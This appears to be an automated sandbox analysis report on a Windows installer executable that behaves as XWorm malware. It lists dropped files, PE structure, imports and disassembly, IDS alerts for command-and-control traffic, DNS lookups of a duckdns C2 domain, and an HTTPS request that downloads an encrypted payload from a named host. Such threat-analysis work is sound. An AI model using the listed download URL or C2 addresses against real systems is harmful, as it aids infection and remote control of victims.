Preview:	....777..((((.J.AA..cc.).6..............B.D.<<................U.................EE.......gg........,,.jjj.............v....................o..........6.....\|\|.......x.A.:.......W.D................E......```..`.....................................h.`...................................._.......X.......h...........LL..............F....```.......GG...............t.........j.jjjjj.5............r..EE............LL.9.............-.22..............1..h...............M......ee....AA...........{{{{...........(................{..:::..}}..........GG....TTT.....UUUUU.r....f............I................VV..mmm...............................444.......??.................................... ........................l.JJ....)...................##.......................X..............u....w....333333...........MM.222................................................................cc...............u.GGGGG.........u..........."..U..XX..............:.....dd....CC.........2..................................~..

C:\Users\user\AppData\Local\Temp\unscorified\genls.med

Download File

Process:	C:\Users\user\Desktop\H33UCslPzv.exe
File Type:	data
Category:	dropped
Size (bytes):	56731
Entropy (8bit):	1.2442160585209034
Encrypted:	false
SSDEEP:	384:6tYghFWWJicOfl9hdYo9Gvdjh1rjjKlsru8a/3FPzYnaIgapZvHcFe/0C2vqW8IP:NyJicyhlodh1jKlP/3FcRseqD
MD5:	BCA0C962216D9B512E1FEE1F72EBA35B
SHA1:	FF228246A15FA291474DF13F96C51A6BBE03FDBE
SHA-256:	9207608EB008266B5F27EFAF786A1B6D2C4B611F484F62B5FF31D764C0225923
SHA-512:	848BEBCE00D0968884AC1A54BC220DA34FADAA072F403434741DFC3F9843EB3848864184F1F38DAEB013CE0BFEE1BDC09679E80F2EAB9C8CC67ABA3816E0548A
Malicious:	false
Preview:	6.~........................................................E...............................x...............................................-...................}..............................O....k..............................................................X..................................).......Y...7.....................W......................................c...................................................................\....................0....................................4............~.........................................................................................Z...............................................W..............................p................I....R.............................9........................%............................................................."\.....................n......8................................C...............................................................b..............u..........................W.................

C:\Users\user\AppData\Local\Temp\unscorified\geometri.cya

Download File

Process:	C:\Users\user\Desktop\H33UCslPzv.exe
File Type:	data
Category:	dropped
Size (bytes):	44084
Entropy (8bit):	1.251987965137089
Encrypted:	false
SSDEEP:	384:H5J4r26NPfk3R0omoj53ZOmVFPACwEygLw6:b4igfY3wEy9
MD5:	8E1ECD1CAD1A69BA46F3589D3EE05FCD
SHA1:	511FE3218234DFD061C85834E32694D500A2D8CA
SHA-256:	027B544D8E1F0A9CC480B455943CDB8B7F2E1E6FE64FA4E84C5FB22F58E75534
SHA-512:	D4E8D21B29799A2FD6AA6B254B0E5F1E212F2CEFF6244D3AE1641F460A88FD39EC32AB04E3787BE6C313ABC85B76A2ECC90FA697C58B9899AEE59B16452D98F7
Malicious:	false
Preview:	....................................................................................................................g.....................t...................)...}..............................................................................................................O.f...............................r................................S...U................:........................................2................................................................7........................."....c.........-..........................>.........................j...........h...............................G2......P.......................qd.......................................................................................................................................\........................7.....................O..T;...LK.......j.........................................................Y..........................J...........................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.954369753521349
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	H33UCslPzv.exe
File size:	3'212'629 bytes
MD5:	9ecae0d26219ddb2355ad7b597887760
SHA1:	3946b3ad9b7233bdda8053c2410d796bdc9fa21d
SHA256:	462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed
SHA512:	728a4282eed54bef2b75e61ef26104a81f036d89d474abf49db406260178d319480a505b1aac324caa92d93d3d2383ff69d064367c1f88bac16611fd21276bd1
SSDEEP:	98304:EH5hTCwpsZGol4OU0HTVHzyCj+7BN72vBqx/Yapu5koUX:A20Rol4Sz1H+7j2JiFpu5kPX
TLSH:	C8E533663341D538C21A53782422F67C673EDBA958081B677720BE697E33B91FF06D22
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........r.../...............+.......Rich............PE..L......].................b....9.....H2............@

File Icon


Icon Hash:	1e175ed66c3c9347

Static PE Info

General

Entrypoint:	0x403248
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5DF6D4D5 [Mon Dec 16 00:50:29 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e9c0657252137ac61c1eeeba4c021000

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A0h]
call dword ptr [0040809Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [007A2F4Ch], eax
je 00007F2380D89533h
push ebx
call 00007F2380D8C61Bh
cmp eax, ebx
je 00007F2380D89529h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007F2380D8C597h
push esi
call dword ptr [00408098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F2380D8950Dh
push 0000000Ah
call 00007F2380D8C5EFh
push 00000008h
call 00007F2380D8C5E8h
push 00000006h
mov dword ptr [007A2F44h], eax
call 00007F2380D8C5DCh
cmp eax, ebx
je 00007F2380D89531h
push 0000001Eh
call eax
test eax, eax
je 00007F2380D89529h
or byte ptr [007A2F4Fh], 00000040h
push ebp
call dword ptr [00408040h]
push ebx
call dword ptr [00408284h]
mov dword ptr [007A3018h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079E508h
call dword ptr [00408178h]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8430	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b6000	0x3ad78	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x294	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x60d8	0x6200	e59663060e65803bb6474d2af98f8aa9	False	0.6750637755102041	data	6.467400856752681	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x123e	0x1400	7969015d02b2f673463f43156b28cdb4	False	0.428515625	data	5.032652926909017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x399058	0x400	2d383339e780dfc9691f30584bbd0766	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a4000	0x12000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b6000	0x3ad78	0x3ae00	a32d901976697d7bbce42d8596684b1d	False	0.6666625199044586	data	6.294242973261698	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3b6388	0x128ae	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9988545095457538
RT_ICON	0x3c8c38	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.4953714657518041
RT_ICON	0x3d9460	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5109049821315955
RT_ICON	0x3e2908	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5138170055452865
RT_ICON	0x3e7d90	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5477680680207841
RT_ICON	0x3ebfb8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5617219917012448
RT_ICON	0x3ee560	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6238273921200751
RT_ICON	0x3ef608	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6639344262295082
RT_ICON	0x3eff90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7296099290780141
RT_DIALOG	0x3f03f8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x3f0540	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3f0640	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3f0760	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3f07c0	0x84	Targa image data - Map 32 x 10414 x 1 +1	English	United States	0.7348484848484849
RT_VERSION	0x3f0848	0x1f0	MS Windows COFF PowerPC object file	English	United States	0.4959677419354839
RT_MANIFEST	0x3f0a38	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll	SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-26T08:45:04.331057+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:04.331057+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:09.209046+0200	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.9	58367	12.221.146.138	9402	TCP
2024-10-26T08:45:09.456365+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:23.795545+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:34.355458+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	12.221.146.138	9402	192.168.2.9	58367	TCP
2024-10-26T08:45:34.355458+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	12.221.146.138	9402	192.168.2.9	58367	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 08:44:29.077681065 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:29.077714920 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:29.077770948 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:29.094818115 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:29.094837904 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.221956968 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.222151041 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.286184072 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.286206007 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.286663055 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.286727905 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.292140961 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.339338064 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.675580978 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.675652027 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.675705910 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.675721884 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.675755024 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.675784111 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.849754095 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.849961042 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:30.934884071 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:30.935075045 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:31.051495075 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:31.051563025 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:31.051587105 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:31.051599979 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:31.051625967 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:31.051647902 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:31.051651001 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:31.051697016 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:31.068434954 CEST	50132	443	192.168.2.9	103.53.40.62
Oct 26, 2024 08:44:31.068454027 CEST	443	50132	103.53.40.62	192.168.2.9
Oct 26, 2024 08:44:55.359270096 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:44:55.365428925 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:44:55.365516901 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:44:55.464358091 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:44:55.470969915 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:45:04.331057072 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:45:04.378631115 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:45:09.209045887 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:45:09.214927912 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:45:09.456365108 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:45:09.503691912 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:45:22.957272053 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:45:22.962677956 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:45:23.795545101 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:45:23.847517967 CEST	58367	9402	192.168.2.9	12.221.146.138
Oct 26, 2024 08:45:34.355458021 CEST	9402	58367	12.221.146.138	192.168.2.9
Oct 26, 2024 08:45:34.410075903 CEST	58367	9402	192.168.2.9	12.221.146.138

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 08:43:38.604912996 CEST	53	63915	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:28.566436052 CEST	49783	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:29.068017960 CEST	53	49783	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:35.569907904 CEST	50807	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:36.566616058 CEST	50807	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:37.581980944 CEST	50807	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:39.580013037 CEST	53	50807	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:39.580029011 CEST	53	50807	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:39.580037117 CEST	53	50807	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:39.926474094 CEST	50568	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:40.925668001 CEST	50568	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:41.954509974 CEST	50568	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:43.936058044 CEST	53	50568	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:43.936080933 CEST	53	50568	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:43.936089993 CEST	53	50568	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:48.536258936 CEST	58030	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:49.535157919 CEST	58030	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:49.542370081 CEST	53	58030	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:52.546559095 CEST	53	58030	1.1.1.1	192.168.2.9
Oct 26, 2024 08:44:54.739025116 CEST	51849	53	192.168.2.9	1.1.1.1
Oct 26, 2024 08:44:55.358004093 CEST	53	51849	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 08:44:28.566436052 CEST	192.168.2.9	1.1.1.1	0x3400	Standard query (0)	apslline.com	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:35.569907904 CEST	192.168.2.9	1.1.1.1	0xb367	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:36.566616058 CEST	192.168.2.9	1.1.1.1	0xb367	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:37.581980944 CEST	192.168.2.9	1.1.1.1	0xb367	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:39.926474094 CEST	192.168.2.9	1.1.1.1	0xcb1a	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:40.925668001 CEST	192.168.2.9	1.1.1.1	0xcb1a	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:41.954509974 CEST	192.168.2.9	1.1.1.1	0xcb1a	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:48.536258936 CEST	192.168.2.9	1.1.1.1	0xc71e	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:49.535157919 CEST	192.168.2.9	1.1.1.1	0xc71e	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:54.739025116 CEST	192.168.2.9	1.1.1.1	0xc22f	Standard query (0)	xwor3july.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 08:44:29.068017960 CEST	1.1.1.1	192.168.2.9	0x3400	No error (0)	apslline.com		103.53.40.62	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:39.580013037 CEST	1.1.1.1	192.168.2.9	0xb367	Server failure (2)	xwor3july.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:39.580029011 CEST	1.1.1.1	192.168.2.9	0xb367	Server failure (2)	xwor3july.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:39.580037117 CEST	1.1.1.1	192.168.2.9	0xb367	Server failure (2)	xwor3july.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:43.936058044 CEST	1.1.1.1	192.168.2.9	0xcb1a	Server failure (2)	xwor3july.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:43.936080933 CEST	1.1.1.1	192.168.2.9	0xcb1a	Server failure (2)	xwor3july.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:43.936089993 CEST	1.1.1.1	192.168.2.9	0xcb1a	Server failure (2)	xwor3july.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:52.546559095 CEST	1.1.1.1	192.168.2.9	0xc71e	Server failure (2)	xwor3july.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:44:55.358004093 CEST	1.1.1.1	192.168.2.9	0xc22f	No error (0)	xwor3july.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

apslline.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	50132	103.53.40.62	443	5968	C:\Users\user\Desktop\H33UCslPzv.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-26 06:44:30 UTC	174	OUT	GET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1 User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: apslline.com Cache-Control: no-cache
2024-10-26 06:44:30 UTC	248	IN	HTTP/1.1 200 OK Date: Sat, 26 Oct 2024 06:44:30 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sat, 12 Oct 2024 18:13:57 GMT Accept-Ranges: bytes Content-Length: 34368 Content-Type: application/octet-stream
2024-10-26 06:44:30 UTC	7944	IN	Data Raw: b4 cc 81 6b 2b c5 ca 92 33 f6 f5 19 a9 8f 73 07 dd df 64 22 2a 70 33 20 60 b4 85 65 f2 8d 9f 4f de c7 71 8e 08 27 8a cd 5d a1 55 1c b2 0f 86 3b 66 a1 1c 89 6b 47 f2 ad b0 ad 9a d4 f9 3a 4d c8 14 75 01 67 03 41 cb 70 11 12 9b ba 6f c5 01 48 e3 46 98 fb ee c6 97 32 1f 69 48 ac ca 73 68 14 7b 10 ea f3 99 ad 6a 22 05 01 c7 70 0f ce dd 19 c0 50 c5 5f 3e 9b bd eb be 94 33 f0 8d 57 f2 8e e3 c9 b7 b4 c3 8a 0a 6e 34 e2 81 e8 72 57 c3 bd d1 da f0 70 78 fa b2 9c 3a 46 fb 12 d5 ec 4b 48 42 9f e3 97 85 0a 36 5e ac d1 be c7 90 4a 37 bc 9e d9 98 f0 cc 4f 10 63 5a 4e f7 c1 1c 8d 90 d9 02 dc ad 87 85 fc 8b a9 cb 79 10 1e 0f 97 4d 31 00 19 ec 12 89 4a c3 a4 3c 7b 59 f1 c9 fe 5f 87 ac a6 7a e8 b9 b6 2d d5 c3 2a b2 05 69 ac 25 2c 3d 50 9d 51 1d ff 9c 03 29 9b 17 43 6a 4e 7f Data Ascii: k+3sd"p3 `eOq']U;fkG:MugApoHF2iHsh{j"pP_>3Wn4rWpx:FKHB6^J7OcZNyM1J<{Y_z-i%,=PQ)CjN
2024-10-26 06:44:30 UTC	8000	IN	Data Raw: 86 33 f5 f4 9f 53 e3 42 77 fa 68 34 96 87 98 23 6f d1 27 72 0b ea ee ed 2b 28 3b 5a 5c ae 0d a9 78 dd 93 6d 93 00 67 cc 60 6b 5d ef ba 23 99 40 72 36 02 23 a2 2d 5e d0 d4 47 a0 7d 00 0a 58 a9 8c 2a 30 57 32 1c 3b f1 cd 76 21 48 94 92 09 de 8c 4a cb d1 5b a0 8c 96 97 74 5c b2 cd d4 ec eb 21 5f 00 70 f6 91 88 c6 53 e5 9e 50 ac 39 64 e7 dd 5d b7 15 5e fa 3b ce aa 77 85 cf 97 fe 7d 12 b6 2f 93 17 5a 50 43 1c c4 21 c7 e6 52 8d 7a f5 a5 fa 50 a5 c4 8e d4 ea 4f 71 6a 0a b8 58 dc 25 04 39 cd a2 29 cb fc b5 63 a7 09 d0 3e 1e 9d 40 65 85 1f e5 2a 5b dd 18 4a 82 1d 26 87 04 fc 50 cc e4 e2 cd 6e d1 50 29 e8 8b 2b 87 e2 18 ea d0 dd 72 52 66 ec 21 86 4a 0d e0 9a 36 1c 61 c7 fe cc e0 86 e7 b1 46 7a 92 9f 6a cc fa 53 09 a5 b6 1b 44 e4 c3 2b 8b 10 33 18 e6 06 e4 36 63 b3 Data Ascii: 3SBwh4#o'r+(;Z\xmg`k]#@r6#-^G}X0W2;v!HJ[t\!_pSP9d]^;w}/ZPC!RzPOqjX%9)c>@e[J&PnP)+rRf!J6aFzjSD+36c
